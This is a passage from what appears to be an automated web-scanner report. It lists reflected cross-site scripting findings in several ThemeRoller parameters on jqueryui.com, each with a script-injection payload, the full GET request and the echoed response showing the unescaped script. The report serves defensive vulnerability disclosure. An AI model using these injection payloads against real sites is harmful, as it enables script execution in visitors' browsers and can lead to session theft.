fault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7e3bc9"><script>alert(1)</script>0a3d7e23c38&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec
...[SNIP]...

4.65. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b897e"><script>alert(1)</script>ffc301760e9 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxb897e"><script>alert(1)</script>ffc301760e9&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxb897e"><script>alert(1)</script>ffc301760e9&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bg
...[SNIP]...

4.66. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62820"><script>alert(1)</script>cb7327678f9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px62820"><script>alert(1)</script>cb7327678f9 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px62820"><script>alert(1)</script>cb7327678f9" type="text/css" media="all" />
...[SNIP]...

4.67. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcb5"><script>alert(1)</script>11892851d8d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e170099bcb5"><script>alert(1)</script>11892851d8d&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e170099bcb5"><script>alert(1)</script>11892851d8d&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTe
...[SNIP]...

4.68. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8019d"><script>alert(1)</script>93ec095a1b8 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222228019d"><script>alert(1)</script>93ec095a1b8&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222228019d"><script>alert(1)</script>93ec095a1b8&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover
...[SNIP]...

4.69. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a64"><script>alert(1)</script>d6e8cc4be07 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e59a64"><script>alert(1)</script>d6e8cc4be07&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
acityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e59a64"><script>alert(1)</script>d6e8cc4be07&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_
...[SNIP]...

4.70. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1cbd"><script>alert(1)</script>c9eff2d2687 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac1cbd"><script>alert(1)</script>c9eff2d2687&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac1cbd"><script>alert(1)</script>c9eff2d2687&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

4.71. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52361"><script>alert(1)</script>1f81954189a was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff52361"><script>alert(1)</script>1f81954189a&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff52361"><script>alert(1)</script>1f81954189a&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextu
...[SNIP]...

4.72. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87309"><script>alert(1)</script>45cc4a066c2 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363687309"><script>alert(1)</script>45cc4a066c2&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363687309"><script>alert(1)</script>45cc4a066c2&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

4.73. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4380f"><script>alert(1)</script>962bd0de158 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d59874380f"><script>alert(1)</script>962bd0de158&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
